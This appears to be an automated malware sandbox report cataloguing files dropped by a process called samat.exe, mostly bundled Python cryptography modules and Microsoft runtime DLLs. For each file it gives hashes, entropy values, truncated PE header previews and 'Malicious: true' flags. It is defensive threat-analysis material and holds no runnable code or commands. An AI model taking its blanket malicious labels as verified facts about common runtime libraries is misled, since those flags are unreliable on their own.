Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`.........................................@l......(m..d...............................(....d...............................e..8............`...............................text...hG.......H.................. ..`.rdata..x....`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_clmul.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	4.967737129255606
Encrypted:	false
SSDEEP:	192:dMpWt/1nCuqaL0kt7TsEx2fiTgDZqGF0T7cqgkLgJ:k/k1Ts64DDJyBgkLg
MD5:	5F057A380BACBA4EF59C0611549C0E02
SHA1:	4B758D18372D71F0AA38075F073722A55B897F71
SHA-256:	BCB14DAC6C87C24269D3E60C46B49EFFB1360F714C353318F5BBAA48C79EC290
SHA-512:	E1C99E224745B86EE55822C1DBCB4555A11EC31B72D87B46514917EB61E0258A1C6D38C4F592969C17EB4F0F74DA04BCECA31CF1622720E95F0F20E9631792E8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." ................P.....................................................`.........................................P8.......8..d....`.......P...............p..(....1...............................1..8............0...............................text............................... ..`.rdata..2....0......................@..@.data...H....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_portable.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.007867576025166
Encrypted:	false
SSDEEP:	192:bMt/1nCuqaL0ktPH0T7fwtF4zDn2rGacqgRGd:1/kpU3Yv4zDXqgRGd
MD5:	49BCA1B7DF076D1A550EE1B7ED3BD997
SHA1:	47609C7102F5B1BCA16C6BAD4AE22CE0B8AEE9E9
SHA-256:	49E15461DCB76690139E71E9359F7FCF92269DCCA78E3BFE9ACB90C6271080B2
SHA-512:	8574D7FA133B72A4A8D1D7D9FDB61053BC88C2D238B7AC7D519BE19972B658C44EA1DE433885E3206927C75DD5D1028F74999E048AB73189585B87630F865466
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_keccak.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	5.226023387740053
Encrypted:	false
SSDEEP:	384:rfRKTN+HLjRskTdf4WazSTkwjEvuY2bylHDiYIgovg:mcHfRl5pauoSjy5DiE
MD5:	CB5CFDD4241060E99118DEEC6C931CCC
SHA1:	1E7FED96CF26C9F4730A4621CA9D18CECE3E0BCE
SHA-256:	A8F809B6A417AF99B75EEEEA3ECD16BDA153CBDA4FFAB6E35CE1E8C884D899C4
SHA-512:	8A89E3563C14B81353D251F9F019D8CBF07CB98F78452B8522413C7478A0D77B9ABF2134E4438145D6363CDA39721D2BAE8AD13D1CDACCBB5026619D95F931CF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...U..f.........." ..... ... ......P.....................................................`..........................................9.......9..d....`.......P..X............p..(...p2...............................2..8............0...............................text............ .................. ..`.rdata..@....0.......$..............@..@.data........@.......4..............@....pdata..X....P.......6..............@..@.rsrc........`.......:..............@..@.reloc..(....p.......<..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_poly1305.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14848
Entropy (8bit):	5.262055670423592
Encrypted:	false
SSDEEP:	192:C/ZN2eq/b04PAHH41F6fnVS0sVn+5CA5Z1cD66WGcqgFjLg:vI4IHHaQfSVnCZyDImgFjLg
MD5:	18D2D96980802189B23893820714DA90
SHA1:	5DEE494D25EB79038CBC2803163E2EF69E68274C
SHA-256:	C2FD98C677436260ACB9147766258CB99780A007114AED37C87893DF1CF1A717
SHA-512:	0317B65D8F292332C5457A6B15A77548BE5B2705F34BB8F4415046E3E778580ABD17B233E6CC2755C991247E0E65B27B5634465646715657B246483817CACEB7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...V..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..\|............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......0..............@....pdata..\|....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Math\_modexp.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.913843738203007
Encrypted:	false
SSDEEP:	384:dspbXtHQY4ubrttQza9CHnZXQsnecAlOF0qZLAXxQI3Sya6XPpMg3Yx8MnDcCPSq:7Y44UagH6cAFCLUSYpMg3YDzPo5kG9G
MD5:	EF472BA63FD22922CA704B1E7B95A29E
SHA1:	700B68E7EF95514D5E94D3C6B10884E1E187ACD8
SHA-256:	66EEF4E6E0CEEEF2C23A758BFBEDAE7C16282FC93D0A56ACAFC40E871AC3F01C
SHA-512:	DC2060531C4153C43ABF30843BCB5F8FA082345CA1BB57F9AC8695EDDB28FF9FDA8132B6B6C67260F779D95FCADCAE2811091BCA300AB1E041FAE6CC7B50ABD8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...\|...5...}...~...U...,...u...,...v...,...}.......\|............._.............Rich~...................PE..d...^..f.........." .....`...0......`.....................................................`..........................................~..\|...L...d...............<...............(....q...............................q..8............p..(............................text...X^.......`.................. ..`.rdata.......p.......d..............@..@.data................x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc..(...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Protocol\_scrypt.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.735350805948923
Encrypted:	false
SSDEEP:	192:rhsC3eqv6b0q3OQ3rHu5bc64OhD2I/p3cqgONLg:r/Hq3jHuY64OhDJJgONLg
MD5:	3B1CE70B0193B02C437678F13A335932
SHA1:	063BFD5A32441ED883409AAD17285CE405977D1F
SHA-256:	EB2950B6A2185E87C5318B55132DFE5774A5A579259AB50A7935A7FB143EA7B1
SHA-512:	0E02187F17DFCFD323F2F0E62FBFE35F326DCF9F119FC8B15066AFAEEE4EB7078184BC85D571B555E9E67A2DD909EC12D8A67E3D075E9B1283813EF274E05C0D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...Z..f.........." ................P.....................................................`..........................................8..d....8..d....`.......P..4............p..(....1...............................1..8............0...............................text...H........................... ..`.rdata..0....0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve25519.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22528
Entropy (8bit):	5.705606408072877
Encrypted:	false
SSDEEP:	384:19BcRxBmau38CYIl9bhgIW0mvufueNr359/tjGGDEFSegqrA:NcRy38J+9dmvufFtaGDV
MD5:	FF33C306434DEC51D39C7BF1663E25DA
SHA1:	665FCF47501F1481534597C1EAC2A52886EF0526
SHA-256:	D0E3B6A2D0E073B2D9F0FCDB051727007943A17A4CA966D75EBA37BECDBA6152
SHA-512:	66A909DC9C3B7BD4050AA507CD89B0B3A661C85D33C881522EC9568744953B698722C1CBFF093F9CBCD6119BD527FECAB05A67F2E32EC479BE47AFFA4377362C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...\..f.........." .....6...$......P.....................................................`.........................................`Y......`Z..d............p..................(....R..............................0R..8............P...............................text...(5.......6.................. ..`.rdata.......P.......:..............@..@.data........`.......J..............@....pdata.......p.......P..............@..@.rsrc................T..............@..@.reloc..(............V..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve448.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	6.0189903352673655
Encrypted:	false
SSDEEP:	1536:Jfju4GgRMgWWnEDZiECgd/iwOXUQdbhov0Clb8Cx4hpK8ithLFIDullRPwDHxXOa:pXRMgWiEDZiECgd/iwOXUQdbhov0ClbU
MD5:	F267BF4256F4105DAD0D3E59023011ED
SHA1:	9BC6CA0F375CE49D5787C909D290C07302F58DA6
SHA-256:	1DDE8BE64164FF96B2BAB88291042EB39197D118422BEE56EB2846E7A2D2F010
SHA-512:	A335AF4DBF1658556ED5DC13EE741419446F7DAEC6BD2688B626A803FA5DD76463D6367C224E0B79B17193735E2C74BA417C26822DAEEF05AC3BAB1588E2DE83
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...\|...5...}...~...U...,...u...,...v...,...}.......\|............._.............Rich~...................PE..d...\..f.........." .........8......`........................................P............`.............................................0.......d....0....... ..$............@..(.......................................8............................................text...8........................... ..`.rdata..............................@..@.data...............................@....pdata..$.... ......................@..@.rsrc........0......................@..@.reloc..(....@......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ec_ws.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	770560
Entropy (8bit):	7.613224993327352
Encrypted:	false
SSDEEP:	12288:XtIrHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h:XtIrHoxJFf1p34hcrn5Go9yQO6
MD5:	1EFD7F7CB1C277416011DE6F09C355AF
SHA1:	C0F97652AC2703C325AB9F20826A6F84C63532F2
SHA-256:	AB45FA80A68DB1635D41DC1A4AAD980E6716DAC8C1778CB5F30CDB013B7DF6E6
SHA-512:	2EC4B88A1957733043BBD63CEAA6F5643D446DB607B3267FAD1EC611E6B0AF697056598AAC2AE5D44AB2B9396811D183C32BCE5A0FF34E583193A417D1C5226B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s.. .. .. ... .. ..!.. ..!.. .. .. ..!.. ..!.. ..!.. \..!.. \..!.. \.r .. \..!.. Rich.. ................PE..d...[..f.........." ................`.....................................................`.............................................h.......d...............................0......................................8...............(............................text............................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed25519.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26112
Entropy (8bit):	5.8551858881598795
Encrypted:	false
SSDEEP:	384:BczadRwoF2MZ81n0XTyMCYIl9bhgIW0mv8aeadRcwRwftjGLD2pRQNgQQ77k:2udRf2MuMJ+9dmv8aea34taLDcfQ
MD5:	C5FB377F736ED731B5578F57BB765F7A
SHA1:	5BA51E11F4DE1CAEDEBA0F7D4D10EC62EC109E01
SHA-256:	32073DF3D5C85ABCE7D370D6E341EF163A8350F6A9EDC775C39A23856CCFDD53
SHA-512:	D361BCDAF2C700D5A4AC956D96E00961432C05A1B692FC870DB53A90F233A6D24AA0C3BE99E40BD8E5B7C6C1B2BCDCDCFC545292EF321486FFC71C5EA7203E6A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...]..f.........." .....B...&......P.....................................................`..........................................i..0....k..d...............................(... b..............................@b..8............`...............................text....A.......B.................. ..`.rdata..P....`.......F..............@..@.data........p.......V..............@....pdata...............^..............@..@.rsrc................b..............@..@.reloc..(............d..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed448.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	84992
Entropy (8bit):	6.064677498000638
Encrypted:	false
SSDEEP:	1536:BrYNvxcZeLrIeNs2qkTwe57DsuP45PqAqVDK9agdUiwOXyQdDrov0slb8gx4TBKW:Br4vxcZeLrIeN1TvHsuP45yAqVDK9ag3
MD5:	8A0C0AA820E98E83AC9B665A9FD19EAF
SHA1:	6BF5A14E94D81A55A164339F60927D5BF1BAD5C4
SHA-256:	4EE3D122DCFFE78E6E7E76EE04C38D3DC6A066E522EE9F7AF34A09649A3628B1
SHA-512:	52496AE7439458DEDB58A65DF9FFDCC3A7F31FC36FE7202FB43570F9BB03ABC0565F5EF32E5E6C048ED3EBC33018C19712E58FF43806119B2FB5918612299E7E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...\|...5...}...~...U...,...u...,...v...,...}.......\|............._.............Rich~...................PE..d...^..f.........." .........8......`.....................................................`..........................................C..h...HE..d....p.......`..l...............(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata..l....`.......>..............@..@.rsrc........p.......H..............@..@.reloc..(............J..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_cpuid_c.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.675380950473425
Encrypted:	false
SSDEEP:	96:frQRpBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSztllIDpqf4AZaRcX6gnO:Qddz2KTnThIz0qfteRIDgRWcqgnCWt
MD5:	44B930B89CE905DB4716A548C3DB8DEE
SHA1:	948CBFF12A243C8D17A7ACD3C632EE232DF0F0ED
SHA-256:	921C2D55179C0968535B20E9FD7AF55AD29F4CE4CF87A90FE258C257E2673AA5
SHA-512:	79DF755BE8B01D576557A4CB3F3200E5EE1EDE21809047ABB9FF8D578C535AC1EA0277EDA97109839A7607AF043019F2C297E767441C7E11F81FDC87FD1B6EFC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................@'..\|....'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_strxor.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.625428549874022
Encrypted:	false
SSDEEP:	96:flipBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSzteXuDVZqYNIfcX6gHCWx:Cddz2KTnThIz0qfteR5DVwYkcqgHCWt
MD5:	F24F9356A6BDD29B9EF67509A8BC3A96
SHA1:	A26946E938304B4E993872C6721EB8CC1DCBE43B
SHA-256:	034BB8EFE3068763D32C404C178BD88099192C707A36F5351F7FDB63249C7F81
SHA-512:	C4D3F92D7558BE1A714388C72F5992165DD7A9E1B4FA83B882536030542D93FDAD9148C981F76FFF7868192B301AC9256EDB8C3D5CE5A1A2ACAC183F96C1028B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...Z..f.........." ................P........................................p............`......................................... '..t....'..P....P.......@...............`..(....!...............................!..8............ ...............................text...h........................... ..`.rdata..`.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120400
Entropy (8bit):	6.6017475353076716
Encrypted:	false
SSDEEP:	1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:	862F820C3251E4CA6FC0AC00E4092239
SHA1:	EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:	36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:	2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............\|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\VCRUNTIME140_1.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	6.701724666218339
Encrypted:	false
SSDEEP:	768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
MD5:	68156F41AE9A04D89BB6625A5CD222D4
SHA1:	3BE29D5C53808186EBA3A024BE377EE6F267C983
SHA-256:	82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
SHA-512:	F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.{...{...{...0...y.......y...r.H.p...{...H.......\|.......`.......~.......z.....$.z.......z...Rich{...........PE..d...l0.?.........." ...).<...8.......@...............................................b....`A........................................pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text....;.......<.................. ..`.rdata.."#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\_asyncio.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	70928
Entropy (8bit):	6.242470629630265
Encrypted:	false
SSDEEP:	768:FCIB0WWuqkJS86D6rznO6uqM+lY5ZkesIcydIJvn/5YiSyvT2ETh:FCY0WStDwnOLYY5ZkeddIJvnx7Sy75h
MD5:	80083B99812171FEA682B1CF38026816
SHA1:	365FB5B0C652923875E1C7720F0D76A495B0E221
SHA-256:	DBEAE7CB6F256998F9D8DE79D08C74D716D819EB4473B2725DBE2D53BA88000A
SHA-512:	33419B9E18E0099DF37D22E33DEBF15D57F4248346B17423F2B55C8DA7CBE62C19AA0BB5740CFAAC9BC6625B81C54367C0C476EAECE71727439686567F0B1234
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Z...........%.....................................................K...................I...........Rich...................PE..d......g.........." ...).d................................................... ............`.........................................`...P.......d......................../.............T...............................@...............(............................text...)b.......d.................. ..`.rdata...O.......P...h..............@..@.data...`...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\_bz2.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	84240
Entropy (8bit):	6.607563436050078
Encrypted:	false
SSDEEP:	1536:Kdrz7l1EVLsSuvX3dUK4MLgqK7YEog8y5sV8lIJLVy7SyFB:urzcuvXvrEo7y6V8lIJLVyB
MD5:	CB8C06C8FA9E61E4AC5F22EEBF7F1D00
SHA1:	D8E0DFC8127749947B09F17C8848166BAC659F0D
SHA-256:	FC3B481684B926350057E263622A2A5335B149A0498A8D65C4F37E39DD90B640
SHA-512:	E6DA642B7200BFB78F939F7D8148581259BAA9A5EDDA282C621D14BA88083A9B9BD3D17B701E9CDE77AD1133C39BD93FC9D955BB620546BB4FCF45C68F1EC7D6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..\|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).....\......0........................................P......7[....`.............................................H...(........0....... .. ......../...@..........T...........................`...@...............x............................text............................... ..`.rdata...=.......>..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\_cffi_backend.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	179200
Entropy (8bit):	6.189919896183334
Encrypted:	false
SSDEEP:	3072:X3LjFuaTzDGA3GrJwUdoSPhpRv9JUizQWS7LkSTLkKWgFIPXD0:X3QaT3GA3NSPhDsizTikSTLLWgF0z0
MD5:	5CBA92E7C00D09A55F5CBADC8D16CD26
SHA1:	0300C6B62CD9DB98562FDD3DE32096AB194DA4C8
SHA-256:	0E3D149B91FC7DC3367AB94620A5E13AF6E419F423B31D4800C381468CB8AD85
SHA-512:	7AB432C8774A10F04DDD061B57D07EBA96481B5BB8C663C6ADE500D224C6061BC15D17C74DA20A7C3CEC8BBF6453404D553EBAB22D37D67F9B163D7A15CF1DED
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i..#-p.p-p.p-p.p$..p!p.p=.q/p.p=.zp)p.p=.q)p.p=.q%p.p=.q!p.pf..q)p.p9.q.p.p-p.p.p.pe..q)p.p$..p,p.pe..q,p.pe.xp,p.pe..q,p.pRich-p.p........................PE..d..._..f.........." ...).....B......@........................................0............`..........................................h..l....i..................T............ ......0O...............................M..@............................................text............................... ..`.rdata..............................@..@.data....].......0...n..............@....pdata..T...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\_ctypes.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	131344
Entropy (8bit):	6.311142284249784
Encrypted:	false
SSDEEP:	3072:3RF024DWkT/DKGkXY402iXnVJf/FO50XnekZ39gPhvEQZIJyPArm:j0nHT/DKFXZorf/FO50uW3SEQt
MD5:	A55E57D7594303C89B5F7A1D1D6F2B67
SHA1:	904A9304A07716497CF3E4EAAFD82715874C94F1
SHA-256:	F63C6C7E71C342084D8F1A108786CA6975A52CEFEF8BE32CC2589E6E2FE060C8
SHA-512:	FFA61AD2A408A831B5D86B201814256C172E764C9C1DBE0BD81A2E204E9E8117C66F5DFA56BB7D74275D23154C0ED8E10D4AE8A0D0564434E9761D754F1997FC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............h....................................... .......Z....`.........................................P.................................../...........=..T............................;..@............0...............................text............................... ..`.rdata...y...0...z..................@..@.data....$....... ..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\_decimal.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	277776
Entropy (8bit):	6.5855511991551
Encrypted:	false
SSDEEP:	6144:x9iD78EIq4x4OA5bZZ0KDgQcI79qWM53pLW1AFR8E4wXw76TPlpV77777VMvyk:xwDGqr5b8EgQ5+w6k
MD5:	F3377F3DE29579140E2BBAEEFD334D4F
SHA1:	B3076C564DBDFD4CA1B7CC76F36448B0088E2341
SHA-256:	B715D1C18E9A9C1531F21C02003B4C6726742D1A2441A1893BC3D79D7BB50E91
SHA-512:	34D9591590BBA20613691A5287EF329E5927A58127CE399088B4D68A178E3AF67159A8FC55B4FCDCB08AE094753B20DEC2AC3F0B3011481E4ED6F37445CECDD5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
